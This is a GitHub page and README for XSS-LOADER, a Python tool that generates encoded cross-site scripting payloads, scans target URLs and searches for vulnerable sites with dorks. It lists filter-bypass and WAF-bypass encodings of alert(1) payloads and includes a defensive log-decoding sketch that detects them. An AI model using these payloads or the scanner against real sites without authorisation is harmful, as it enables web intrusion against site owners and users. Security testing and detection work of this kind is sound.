https://github.com/capture0x/XSS-LOADER
Xss Payload Generator ~ Xss Scanner ~ Xss Dork Finder
bypass-filter dork-finder hacking payload-generator payloads xss xss-attacks xss-bypass xss-detection xss-finder xss-injection xss-payloads xss-scanner
Last synced: about 1 month ago
- Host: GitHub
- URL: https://github.com/capture0x/XSS-LOADER
- Owner: capture0x
- License: cc0-1.0
- Created: 2020-03-23T18:04:36.000Z (about 5 years ago)
- Default Branch: master
- Last Pushed: 2023-07-25T15:47:52.000Z (almost 2 years ago)
- Last Synced: 2024-08-03T01:26:01.308Z (10 months ago)
- Topics: bypass-filter, dork-finder, hacking, payload-generator, payloads, xss, xss-attacks, xss-bypass, xss-detection, xss-finder, xss-injection, xss-payloads, xss-scanner
- Language: Python
- Homepage:
- Size: 48.8 KB
- Stars: 543
- Watchers: 15
- Forks: 112
- Open Issues: 10
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-rainmana - capture0x/XSS-LOADER - Xss Payload Generator ~ Xss Scanner ~ Xss Dork Finder (Python)
- awesome-hacking-lists - capture0x/XSS-LOADER - Xss Payload Generator ~ Xss Scanner ~ Xss Dork Finder (Python)
README
# :gem: XSS-LOADER TOOLS :gem:
#### Written by TMRSWRR
#### Version 1.0.0
All-in-one tool for **XSS PAYLOAD GENERATOR - XSS SCANNER - XSS DORK FINDER**

Instagram: [TMRSWRR](https://www.instagram.com/tmrswrr/)
## 👇 :love_letter: How to use :love_letter: 👇
https://www.youtube.com/watch?v=ys_a5yx1hmY
## 📒 Read Me 📒
* This tool creates payloads for use in XSS injection.
* Select one of the default payload tags from the menu, or write your own payload.
* The Xss Scanner option performs XSS injection against a target URL.
* The Xss Dork Finder option finds URLs of vulnerable sites.

## :cd: Installation :cd:
### Installation with requirements.txt
```bash
git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt
```
## Usage
```bash
python3 payloader.py
```
## 🗃️ Features 🗃️
#### *Basic Payload
Sets the default parameter to: `alert(1)`
#### *Div Payload
Sets the default parameter to: `MOVE HERE`
#### *Body Payload
Sets the default parameter to:
#### *Svg Payload
Sets the default parameter to:
#### *Enter Your Payload
Encodes a payload written by the user.
#### *Payload Generator Parameter
Encodes the payload on the selected tag using one of the following options:
```
* | 1. UPPER CASE----> ALERT(1)
* | 2. UPPER AND LOWER CASE----> aleRt(1)
* | 3. URL ENCODE -----> %3Cscript%3Ealert%281%29%3C%2Fscript%3E
* | 4. HTML ENTITY ENCODE-----> <script>alert(1)</script>
* | 5. SPLIT PAYLOAD -----> pt>>alert(1)pt>>
* | 6. HEX ENCODE -----> 3c7363726970743e616c6572742831293c2f7363726970743e
* | 7. UTF-16 ENCODE -----> Encode payload to utf-16 format.
* | 8. UTF-32 ENCODE-----> Encode payload to utf-32 format.
* | 9. DELETE TAG -----> ";alert('XSS');//
* | 10. UNICODE ENCODE-----> %uff1cscript%uff1ealert(1)%uff1c/script%uff1e
* | 11. US-ASCII ENCODE -----> ¼script¾alert(1)¼/script¾
* | 12. BASE64 ENCODE -----> PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
* | 13. UTF-7 ENCODE -----> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
* | 14. PARENTHESIS BYPASS -----> alert`1`
* | 15. UTF-8 ENCODE -----> %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE
* | 16. TAG BLOCK BREAKOUT-----> ">alert(1)
* | 17. SCRIPT BREAKOUT-----> alert(1)
* | 18. FILE UPLOAD PAYLOAD-----> ">alert(1).gif
* | 19. INSIDE COMMENTS BYPASS-----> alert(1)-->
* | 20. MUTATION PAYLOAD----->
* | 21. MALFORMED IMG----->alert(1)">
* | 22. SPACE BYPASS----->![]()
* | 23. DOWNLEVEL-HIDDEN BLOCK----->
* | 24. WAF BYPASS PAYLOADS-----> Show Waf Bypass Payload List
* | 25. CLOUDFLARE BYPASS PAYLOADS-----> Show Cloudflare Bypass Payload List
* | 26. POLYGLOT PAYLOADS-----> Show Polyglot Bypass Payload List
* | 27. ALERT PAYLOADS-----> Show Alert Payload List
* | 28. ALL CREATE PAYLOAD-----> Show Create All Payloads
* | 29. GO BACK MAIN MENU
* | 30. EXIT
```
#### *Xss Scanner
First enter the URL of the target, in this form:
e.g. target -----> http://target.com/index.php?name=

Then select the payload list to scan with:
* BASIC PAYLOAD LIST ==> Payload list consisting of script tags
* DIV PAYLOAD LIST ==> Payload list consisting of div tags
* IMG PAYLOAD LIST ==> Payload list consisting of img tags
* BODY PAYLOAD LIST ==> Payload list consisting of body tags
* SVG PAYLOAD LIST ==> Payload list consisting of svg tags
* MIXED PAYLOAD LIST ==> Payload list consisting of all tags
* ENTER FILE PATH ==> Payload list chosen by the user; enter the file path as in this example:
(e.g. path -----> /usr/share/wordlists/wfuzz/Injections/XSS.txt)

Results are written to "vulnpayload.txt" after scanning.
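On the defending side, the encodings in the Payload Generator list and the scanner's requests against a `?name=`-style parameter show up in web-server logs, and a filter that matches only a literal tag misses most of them. The following sketch is an added example, not part of XSS-LOADER: it undoes each encoding in turn before matching. The function names, the log format and the `TAG` pattern are assumptions; the encoded values are the README's own samples.

```python
import base64
import html
import re
import unicodedata
from urllib.parse import unquote, urlsplit

TAG = re.compile(r"<\s*/?\s*(script|div|img|body|svg)\b", re.I)

def _pct_u(v):  # non-standard %uXXXX escapes; NFKC folds fullwidth U+FF1C to '<'
    v = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), v)
    return unicodedata.normalize("NFKC", v)

DECODERS = [
    ("url/plain", lambda v: v),  # value has already been through unquote()
    ("html-entity", html.unescape),
    ("percent-u", _pct_u),
    ("hex", lambda v: bytes.fromhex(v).decode("latin-1")),
    ("base64", lambda v: base64.b64decode(v, validate=True).decode("latin-1")),
    ("utf-7", lambda v: v.encode("ascii").decode("utf-7")),
]

def classify(value):
    """Name the decoding that exposes an HTML tag in value, or return None."""
    value = unquote(value)  # %XX layer; unlike unquote_plus it keeps '+'
    for name, decode in DECODERS:
        try:
            if TAG.search(decode(value)):
                return name
        except ValueError:  # input is not valid for this decoder
            continue
    return None

def scan_log(lines):
    """Return (parameter, decoding) for each query parameter hiding a tag."""
    hits = []
    for m in re.finditer(r'"(?:GET|POST) (\S+) HTTP', "\n".join(lines)):
        for pair in urlsplit(m.group(1)).query.split("&"):
            name, _, value = pair.partition("=")
            if kind := classify(value):
                hits.append((name, kind))
    return hits

# Constructed requests; the encoded values are the README's own examples.
VALUES = ["alice", "%3Cscript%3Ealert%281%29%3C%2Fscript%3E",
          "3c7363726970743e616c6572742831293c2f7363726970743e",
          "PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
          "+ADw-script+AD4-alert(1)+ADw-/script+AD4-",
          "%uff1cscript%uff1ealert(1)%uff1c/script%uff1e"]
SAMPLE = ['198.51.100.7 "GET /index.php?name=%s HTTP/1.1" 200' % v for v in VALUES]
```

`scan_log(SAMPLE)` flags five of the six requests and names the decoding that exposed the tag in each. Log matching of this kind only tells you a scan happened; context-aware output encoding in the application is what stops the reflected value from executing.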
#### *Xss Dork Finder
First enter the dork to search for:
e.g. ----> inurl:"search.php?q="

Results are saved in "dork.txt" after scanning.
## Known Issues
### Fixed:
- Unicode errors
- Module errors
**Important:**
If you want to use the tool with Python 3 installed on Windows, download it from the link below:
https://github.com/capture0x/XSS-LOADER-for-WINDOWS
## Bugs and enhancements
For bug reports or enhancements, please open an [issue](https://github.com/capture0x/XSS-LOADER/issues) here.
**Copyright 2020**